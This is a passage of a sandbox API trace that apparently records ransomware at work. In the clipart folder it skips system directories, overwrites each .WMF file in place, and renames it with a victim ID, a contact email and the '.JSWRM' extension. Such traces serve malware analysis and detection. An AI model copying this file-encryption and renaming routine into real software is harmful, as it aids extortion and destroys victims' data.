0x2104e8 [0089.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0089.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0089.190] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297757.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297757.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.191] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=18750) returned 1 [0089.191] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4930) returned 0x24d210 [0089.191] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4930, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4930, lpOverlapped=0x0) returned 1 [0089.194] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.194] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4930, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4930, lpOverlapped=0x0) returned 1 [0089.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.194] CloseHandle (hObject=0x314) returned 1 [0089.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0089.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0089.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0089.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0089.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0089.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0089.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0089.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0089.195] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297757.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297757.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297757.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297757.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0089.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0089.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0089.196] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3e0b76, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3e0b76, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3e0b76, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4960, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0297759.WMF", cAlternateFileName="")) returned 1 [0089.196] lstrcmpiW (lpString1="J0297759.WMF", lpString2=".") returned 1 [0089.196] lstrcmpiW (lpString1="J0297759.WMF", lpString2="..") returned 1 [0089.196] lstrcmpiW (lpString1="J0297759.WMF", lpString2="...") returned 1 [0089.196] lstrcmpiW (lpString1="J0297759.WMF", lpString2="windows") returned -1 [0089.196] lstrcmpiW (lpString1="J0297759.WMF", lpString2="recovery") returned -1 [0089.196] lstrcmpiW (lpString1="J0297759.WMF", lpString2="perflogs") returned -1 [0089.196] lstrcmpiW (lpString1="J0297759.WMF", lpString2="documents and settings") returned 1 [0089.196] lstrcmpiW (lpString1="J0297759.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.196] lstrcmpiW (lpString1="J0297759.WMF", lpString2="system volume information") returned -1 [0089.196] lstrcmpiW (lpString1="J0297759.WMF", lpString2="msocache") returned -1 [0089.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0089.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0297759.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0297759.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0297759.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0089.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0089.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0297759.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0297759.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0297759.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0089.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0089.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0089.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0089.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297759.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297759.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.197] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=18784) returned 1 [0089.197] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4960) returned 0x24d210 [0089.197] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4960, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4960, lpOverlapped=0x0) returned 1 [0089.200] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.200] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4960, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4960, lpOverlapped=0x0) returned 1 [0089.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.201] CloseHandle (hObject=0x314) returned 1 [0089.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0089.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0089.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0089.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0089.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0089.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0089.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0089.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0089.201] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297759.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297759.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297759.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297759.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0089.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0089.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0089.202] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3e0b76, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3e0b76, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3e0b76, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4584, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0300862.WMF", cAlternateFileName="")) returned 1 [0089.202] lstrcmpiW (lpString1="J0300862.WMF", lpString2=".") returned 1 [0089.202] lstrcmpiW (lpString1="J0300862.WMF", lpString2="..") returned 1 [0089.202] lstrcmpiW (lpString1="J0300862.WMF", lpString2="...") returned 1 [0089.202] lstrcmpiW (lpString1="J0300862.WMF", lpString2="windows") returned -1 [0089.202] lstrcmpiW (lpString1="J0300862.WMF", lpString2="recovery") returned -1 [0089.202] lstrcmpiW (lpString1="J0300862.WMF", lpString2="perflogs") returned -1 [0089.202] lstrcmpiW (lpString1="J0300862.WMF", lpString2="documents and settings") returned 1 [0089.202] lstrcmpiW (lpString1="J0300862.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.202] lstrcmpiW (lpString1="J0300862.WMF", lpString2="system volume information") returned -1 [0089.202] lstrcmpiW (lpString1="J0300862.WMF", lpString2="msocache") returned -1 [0089.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0089.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0300862.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0300862.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0300862.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0089.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0089.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0300862.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0300862.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0300862.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0089.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0089.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0089.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0089.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0300862.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0300862.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.203] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17796) returned 1 [0089.204] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4580) returned 0x24d210 [0089.204] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4580, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4580, lpOverlapped=0x0) returned 1 [0089.206] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.207] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4580, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4580, lpOverlapped=0x0) returned 1 [0089.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.207] CloseHandle (hObject=0x314) returned 1 [0089.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0089.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0089.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0089.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0089.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0089.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0089.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0089.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0089.207] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0300862.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0300862.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0300862.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0300862.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0089.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0089.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0089.208] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3e0b76, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3e0b76, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3e0b76, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2b0e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0301044.WMF", cAlternateFileName="")) returned 1 [0089.208] lstrcmpiW (lpString1="J0301044.WMF", lpString2=".") returned 1 [0089.208] lstrcmpiW (lpString1="J0301044.WMF", lpString2="..") returned 1 [0089.208] lstrcmpiW (lpString1="J0301044.WMF", lpString2="...") returned 1 [0089.208] lstrcmpiW (lpString1="J0301044.WMF", lpString2="windows") returned -1 [0089.208] lstrcmpiW (lpString1="J0301044.WMF", lpString2="recovery") returned -1 [0089.208] lstrcmpiW (lpString1="J0301044.WMF", lpString2="perflogs") returned -1 [0089.208] lstrcmpiW (lpString1="J0301044.WMF", lpString2="documents and settings") returned 1 [0089.208] lstrcmpiW (lpString1="J0301044.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.208] lstrcmpiW (lpString1="J0301044.WMF", lpString2="system volume information") returned -1 [0089.208] lstrcmpiW (lpString1="J0301044.WMF", lpString2="msocache") returned -1 [0089.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0089.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0301044.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0301044.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0301044.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0089.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0089.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0301044.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0301044.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0301044.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0089.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0089.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0089.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0089.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301044.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301044.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.210] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11022) returned 1 [0089.210] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b00) returned 0x24d210 [0089.210] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2b00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2b00, lpOverlapped=0x0) returned 1 [0089.213] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.213] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2b00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2b00, lpOverlapped=0x0) returned 1 [0089.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 